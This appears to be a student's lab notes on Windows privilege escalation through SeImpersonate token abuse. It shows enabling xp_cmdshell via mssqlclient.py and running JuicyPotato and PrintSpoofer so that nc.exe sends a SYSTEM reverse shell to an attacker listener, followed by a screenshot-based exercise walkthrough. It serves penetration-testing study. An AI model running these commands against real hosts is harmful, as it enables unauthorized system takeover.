7 - SeImpersonate & SeAssignPrimaryToken

# Intro - In Windows, every process has a token that has info about the account that is running it - These tokens are not considered secure resources, as they are just locations within memory that could be brute-forced by users that cannot read memory - To utilize the token, the `SeImpersonate` privilege is needed - It is only given to admin accounts and can be removed during system hardening - Legitimate programs may utilize another process's token to escalate from Administrator to Local System, which has additional privs - NOTE: We will often run into this privilege after gaining RCE via an app that runs in the context of a service account - Attackers often abuse this privilege in the "Potato style" privescs - where a service account can `SeImpersonate`, but not obtain full SYSTEM level privileges - In short, the Potato attack tricks a process running as SYSTEM to connect to their process, which hands over the token to be used - This [paper](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt) is worth reading for further details on token impersonation attacks # JuicyPotato - Assume for this example, we gained a foothold on a SQL server using a privileged SQL user - Client connections to IIS and SQL Server may be configured to use Windows Authentication - The server may then need to access other resources such as file shares as the connecting client - It can be done by impersonating the user whose context the client connection is established. To do so, the service account will be granted the [Impersonate a client after authentication](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication) priv - Continuing with this example, the SQL Service service account is running in the context of the default `mssqlserver` account - Imagine we have achieved command execution as this user using `xp_cmdshell` using a set of credentials obtained in a `logins.sql` file on a file share using the `Snaffler` tool ## Connect with `mssqlclient.py` - Using the creds found in the `logins.sql` file, connect to the SQL server ```bash mssqlclient.py [email protected] -windows-auth ``` - Now enable `xp_cmdshell` and check privs ```mssql SQL> enable_xp_cmdshell SQL> xp_cmdshell whoami SQL> xp_cmdshell whoami /priv ``` - Above the `whoami /priv` command confirms that the `nt service\mssql$sqlexpress01` user has SeImpersonate privs ## Privesc with JuicyPotato - [JuicyPotato](https://github.com/ohpe/juicy-potato) can be used to exploit the `SeImpersonate` or `SeAssignPrimaryToken` privs via DCOM/NTLM reflection abuse to impersonate a privileged account such as `NT AUTHORITY\SYSTEM` - First, download the `JuicyPotato.exe` and `nc.exe` bins on Kali and move both to the target server - Next, setup a listener on Kali ```bash sudo nc -lvnp 8443 ``` - Then, execute `JuicyPotato.exe` as below where `-l` is the COM server listening port, `-p` is the program to launch (i.e., `cmd.exe`), `-a` is the argument passed to `cmd.exe`, and `-t` is the `createprocess` call ```mssql SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.15.160 8443 -e cmd.exe" -t * ``` # PrintSpoofer and RoguePotato - `JuicyPotato` doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards - However, [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) and [RoguePotato](https://github.com/antonioCoco/RoguePotato) can be used to leverage the same privileges and gain `NT AUTHORITY\SYSTEM` level access - This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse the SeImpersonate priv on Windows 10 and Server 2019 hosts where J`uicyPotato` no longer works ## Privesc with PrintSpoofer - Like before, connect with `mssqlclient.py` - Download the `PrintSpoofer.exe` and `nc.exe` bins on Kali and move both to the target server - Next, setup a listener on Kali - Finally, execute `PrintSpoofer.exe` ```mssql SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd" ``` --- # Exercise - `ping` test ![[images/Pasted image 20260218200040.png]] - `nmap` scan ![[images/Pasted image 20260218200148.png]] - connect to target's mssql server on port 1433 using `mssqlclient.py` with given creds ![[images/Pasted image 20260218195109.png]] - enable `xp_cmdshell` ![[images/Pasted image 20260218195523.png]] - enum target's OS version and current user's privs ![[images/Pasted image 20260218195605.png]]![[images/Pasted image 20260218200137.png]] - this target is vulnerable to `JuicyPotato` because its pre Server 2019 - download `nc.exe` and `JuicyPotato` ![[images/Pasted image 20260218200001.png]] - move to target > actually these tools already exit on the target ![[images/Pasted image 20260218200459.png]] - execute `juicypotato.exe` ![[images/Pasted image 20260218200944.png]] - we have a hit on our listener ![[images/Pasted image 20260218200952.png]]